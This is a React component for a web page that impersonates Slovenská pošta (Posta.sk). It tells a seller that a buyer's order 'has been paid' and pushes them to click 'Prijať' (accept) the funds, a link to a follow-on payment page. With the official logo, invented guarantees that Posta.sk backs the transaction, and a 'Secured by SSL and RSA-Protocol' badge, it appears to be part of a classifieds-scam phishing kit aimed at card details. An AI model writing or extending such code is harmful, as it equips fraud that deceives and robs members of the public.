import React, { useEffect, useState, useMemo } from 'react';
import { Link, useParams } from 'react-router-dom';
import { usePaymentPaths } from '../paymentPaths';
import './PostaSkSuccess.css';
import SupportWidget from './SupportWidget';
import { fetchPageWithFallback } from '../fetchPageWithFallback';
import { getPrimaryCurrency, getSymbol } from '../stripeCurrency';

const SESSION_STORAGE_KEYS = { sessionId: 'payment_session_id' };
const P = process.env.PUBLIC_URL || '';
/** Oficiálny logotyp Slovenská pošta (rovnaký vizuál ako na Posta.sk). */
const LOGO_SRC = `${P}/eposta-sk-logo.svg`;

function LockIcon() {
  return (
    <svg viewBox="0 0 24 24" fill="none" stroke="currentColor" strokeWidth="2" aria-hidden>
      <rect x="5" y="11" width="14" height="10" rx="2" />
      <path d="M8 11V7a4 4 0 0 1 8 0v4" strokeLinecap="round" />
    </svg>
  );
}

/**
 * Posta.sk / Slovenská pošta (SK) — prijatie prostriedkov, CTA → index2.
 */
function PostaSkSuccess({ page }) {
  const { pageCode } = useParams();
  const [pageData, setPageData] = useState(page || null);
  const [loading, setLoading] = useState(!page);
  const [thumbFailed, setThumbFailed] = useState(false);
  const [sessionId] = useState(() => sessionStorage.getItem(SESSION_STORAGE_KEYS.sessionId) || null);

  const photoUrl = useMemo(() => (pageData?.photo_url || '').trim(), [pageData?.photo_url]);

  useEffect(() => {
    setThumbFailed(false);
  }, [photoUrl]);

  useEffect(() => {
    if (page) {
      setPageData(page);
      setLoading(false);
      return;
    }
    if (!pageCode) {
      setLoading(false);
      return;
    }
    setLoading(true);
    fetchPageWithFallback(pageCode)
      .then((data) => {
        if (data.success && data.page) setPageData(data.page);
      })
      .finally(() => setLoading(false));
  }, [pageCode, page]);

  const countryCode = (pageData?.country_code || 'SK').toUpperCase();
  const currencyCode = getPrimaryCurrency(countryCode) || 'EUR';
  const sym = getSymbol(currencyCode);

  const priceNumber = (() => {
    const raw = pageData?.price;
    if (raw == null || String(raw).trim() === '') return null;
    const s = String(raw)
      .replace(/\s+/g, '')
      .replace(/[^0-9.,-]/g, '')
      .replace(',', '.');
    const n = parseFloat(s);
    return Number.isFinite(n) ? n : null;
  })();

  const priceText =
    priceNumber == null
      ? '—'
      : priceNumber % 1 === 0
        ? String(priceNumber.toFixed(0))
        : String(priceNumber);

  const amountLine = priceText === '—' ? `— ${sym}` : `${priceText} ${sym}`;
  const ctaLabel = priceText === '—' ? `Prijať ${sym}` : `Prijať ${priceText} ${sym}`;

  const address = (pageData?.delivery_address || '').trim() || '—';
  const fullName =
    [pageData?.first_name, pageData?.middle_name, pageData?.last_name].filter(Boolean).join(' ').trim() || '—';
  const productTitle = (pageData?.product_name || '').trim() || '—';
  const { toIndex2 } = usePaymentPaths(pageCode);
  const index2Path = toIndex2();
  const showProductThumb = Boolean(photoUrl) && !thumbFailed;

  if (loading && pageCode) {
    return (
      <div className="posta-sk-wrap">
        <header className="posta-sk-header">
          <div className="posta-sk-header-inner">
            <img src={LOGO_SRC} alt="" className="posta-sk-logo-header" width={367} height={328} decoding="async" />
          </div>
        </header>
        <h1 className="posta-sk-title">Prijatie finančných prostriedkov</h1>
        <main className="posta-sk-main">
          <div className="posta-sk-loading">Načítava sa…</div>
        </main>
        <SupportWidget sessionId={sessionId} countryCode={countryCode} />
      </div>
    );
  }

  return (
    <div className="posta-sk-wrap">
      <header className="posta-sk-header">
        <div className="posta-sk-header-inner">
          <img src={LOGO_SRC} alt="Slovenská pošta" className="posta-sk-logo-header" width={367} height={328} decoding="async" />
        </div>
      </header>
      <h1 className="posta-sk-title">Prijatie finančných prostriedkov</h1>

      <main className="posta-sk-main">
        <div className="posta-sk-grid">
          <div className="posta-sk-card">
            <div className="posta-sk-top">
              <div className="posta-sk-thumb" aria-hidden>
                {showProductThumb ? (
                  <img
                    src={photoUrl}
                    alt=""
                    className="posta-sk-thumb-img"
                    decoding="async"
                    onError={() => setThumbFailed(true)}
                  />
                ) : null}
              </div>
              <div className="posta-sk-product-block">
                <p className="posta-sk-product-name">{productTitle}</p>
                <p className="posta-sk-price">{amountLine}</p>
              </div>
            </div>

            <h2 className="posta-sk-section-label">Kupujúci</h2>
            <div className="posta-sk-field">
              <span className="posta-sk-field-label">Adresa</span>
              <div className="posta-sk-value">{address}</div>
            </div>
            <div className="posta-sk-field">
              <span className="posta-sk-field-label">Celé meno</span>
              <div className="posta-sk-value">{fullName}</div>
            </div>

            <p className="posta-sk-legal">
              Potvrdenie o doručení. V súlade s podmienkami používania doručovacej služby Posta.sk je potrebné do 3 dní
              obdržať kontaktné údaje kupujúceho a adresu, na ktorú bude tovar odoslaný.
            </p>
            <p className="posta-sk-legal">
              Posta.sk je garantom transakcie a Posta.sk je plne zodpovedný za všetky transakcie v prípade nezhôd v
              riadení dodávok.
            </p>
          </div>

          <aside className="posta-sk-card posta-sk-aside">
            <p className="posta-sk-aside-status">Objednávka bola vyplatená</p>
            <Link to={index2Path} className="posta-sk-btn">
              {ctaLabel}
            </Link>
            <div className="posta-sk-ssl">
              <LockIcon />
              Secured by SSL and RSA-Protocol
            </div>
          </aside>
        </div>
      </main>

      <SupportWidget sessionId={sessionId} countryCode={countryCode} />
    </div>
  );
}

export default PostaSkSuccess;
